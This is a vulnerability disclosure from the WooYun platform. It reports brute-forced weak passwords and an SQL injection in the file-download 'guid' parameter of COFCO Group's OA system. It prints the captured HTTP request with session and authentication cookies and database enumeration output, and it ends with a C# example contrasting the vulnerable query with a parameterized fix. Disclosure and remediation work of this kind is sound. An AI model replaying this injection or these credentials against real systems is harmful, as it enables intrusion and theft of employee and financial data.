Vulnerability summary

Defect ID: wooyun-2015-0147219

Title: Bundled vulnerabilities in a COFCO Group system (SQL injection / weak passwords)

Vendor: 中粮集团有限公司 (COFCO Group)

Author: 路人甲

Submitted: 2015-10-16 17:08

Fixed: 2015-12-03 09:26

Published: 2015-12-03 09:26

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-16: Details sent to the vendor; awaiting vendor handling
2015-10-19: Vendor confirmed; details visible to the vendor only
2015-10-29: Details opened to core white hats and domain experts
2015-11-08: Details opened to regular white hats
2015-11-18: Details opened to intern white hats
2015-12-03: Details opened to the public

Brief description:

As per the title.

Detailed description:

1. COFCO Group OA system:
http://oa.cofco-keystone.com/login.aspx?ReturnUrl=%2f

[Screenshot: 登陆.png, the login page]

Logins can be brute-forced; roughly a dozen or more accounts were recovered.

[Screenshot: 爆破.png, brute-force results]

Logging in with one of them at random gave a finance department manager's account.

[Screenshot: 登陆页面.png, post-login page]

The complete address book is readable, exposing employee mobile numbers and e-mail addresses.

[Screenshots: 通讯录3.png, 通讯录.png, 通讯录2.png, address book]

Large numbers of internal documents.

[Screenshot: 文件.png, documents]

Financial documents.

[Screenshot: 财务文件.png, financial documents]

Proof of vulnerability:

2. SQL injection
The file download function is injectable.

[Screenshot: 下载.png, file download]

Capturing the request shows that the file name has been renamed and is stored in the database; a single quote produces a database error.

[Screenshot: 注入点.jpg, injection point]


GET /webdoc/file_download.aspx?guid=9969d7d40ef64d43b10cf2306a24b90a* HTTP/1.1
Host: oa.cofco-keystone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://oa.cofco-keystone.com/frm/frm_flow_mainform.aspx?flow_ins_id=35076&flow_id=56&frm_id=72&id=0&hidbutton=true&Dialog=open
Cookie: ASP.NET_SessionId=pv1o1va1losavp453kg0fo55; LtpaToken=AAECAzU2MjAzRTAwNTYyMThGODB6aGFuZ2xlad1YTytfNlfv3WEZfa6hjwO7afmW; .ASPXAUTH=250164406A3B28308592637D653CED7B351F821F209BB2B9CA1CEFE01BB656133A12E508F84ECB9CE276F836A055D420B2225DAC268132D47E0CC4666512B1A99B3D7DD360CE927B9551CB611F251386FCA9CF5B09E029168B7BD49134B1C27EC483CDDC45D2B87F4F878C958DF8A72319ED879E; FIOA_EMP_ID=212; loginname=zhanglei; loginorg=1; FIOA_IMG_FOLDER=FI; lastLtpaTokenHeadKK=AAECAzU2MjAzRTAwNTYyMThGODB6aGFuZ2xlad1YTytfNlfv3WEZfa6hjwO7afmW; condition_is_in_cookie_0d650337a5854fcf=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29; condition_is_in_cookie_a1d79435d4d04641=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29; condition_is_in_cookie_cd9541d7cecd4cad=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29
Connection: keep-alive


guid is the injectable parameter.
The database login has DBA privileges.

[Screenshot: dba.png, DBA privilege check]

14 databases are reachable.

[Screenshot: dbs.jpg, database list]

The current database has close to 1,000 tables:

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: EIS
[978 tables]


Did not go any further.

Remediation:

Filter the injectable parameter.
Address the weak passwords.
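The following is an added illustration, not code from the report or from the vendor's OA system, of why a `file_download.aspx?guid=...` lookup breaks on a single quote and what "filter the parameter" looks like in ASP.NET/C#: validate the value as a GUID, then bind it as a typed parameter. The table and column names (`FILE_STORE`, `file_guid`, `stored_name`), the connection string and the store directory are assumptions; only the `guid` parameter and the MS SQL Server back end come from the report.

```csharp
// Added example, not from the report or the vendor's code. Hypothetical
// lookup behind a file_download.aspx?guid=... endpoint on MS SQL Server.
// FILE_STORE, file_guid and stored_name are assumed names.
using System;
using System.Data;
using System.Data.SqlClient;
using System.IO;
using System.Web;

public static class FileDownload
{
    // VULNERABLE: the raw query-string value is spliced into the SQL text.
    // A single quote in guid breaks the statement (the error the report
    // observed) and whatever follows it runs as SQL with the privileges of
    // the application's database login (DBA-level, per the report).
    public static string VulnerableLookup(SqlConnection conn, string guid)
    {
        string sql = "SELECT stored_name FROM FILE_STORE WHERE file_guid = '"
                     + guid + "'";
        using (var cmd = new SqlCommand(sql, conn))
            return cmd.ExecuteScalar() as string;
    }

    // Shape check: "N" accepts exactly 32 hex digits, the form used in the
    // report's URL. Anything else (quotes, comments, spaces) is rejected
    // before the database is ever contacted.
    public static bool TryParseFileGuid(string raw, out Guid parsed)
    {
        parsed = Guid.Empty;
        return raw != null && Guid.TryParseExact(raw, "N", out parsed);
    }

    // HARDENED: the value reaches SQL Server as a uniqueidentifier parameter,
    // never as part of the statement text, so it cannot change the query.
    public static string SafeLookup(SqlConnection conn, Guid fileGuid)
    {
        const string sql =
            "SELECT stored_name FROM FILE_STORE WHERE file_guid = @guid";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@guid", SqlDbType.UniqueIdentifier).Value = fileGuid;
            return cmd.ExecuteScalar() as string;
        }
    }

    // Handler glue: resolve the renamed on-disk file and stream it back.
    // storeDir is the directory uploads are renamed into (assumed). The
    // connection string should use a login limited to this table, not a
    // sysadmin account; that fix lives in configuration, not in this code.
    public static void ProcessRequest(HttpContext ctx, string connString,
                                      string storeDir)
    {
        Guid fileGuid;
        if (!TryParseFileGuid(ctx.Request.QueryString["guid"], out fileGuid))
        {
            ctx.Response.StatusCode = 400;   // malformed identifier, not an error page
            return;
        }
        using (var conn = new SqlConnection(connString))
        {
            conn.Open();
            string stored = SafeLookup(conn, fileGuid);
            if (stored == null)
            {
                ctx.Response.StatusCode = 404;
                return;
            }
            // stored_name comes from our own table, but confine the result
            // to storeDir so a tampered row cannot point outside it.
            string path = Path.Combine(storeDir, Path.GetFileName(stored));
            ctx.Response.ContentType = "application/octet-stream";
            ctx.Response.TransmitFile(path);
        }
    }
}
```

Returning a generic 400 for a malformed `guid` also removes the verbose database error that made the injection point visible in the first place.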

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-10-19 09:24

Vendor reply:

Received. We will deal with it as soon as possible, thanks!

Latest status:

None yet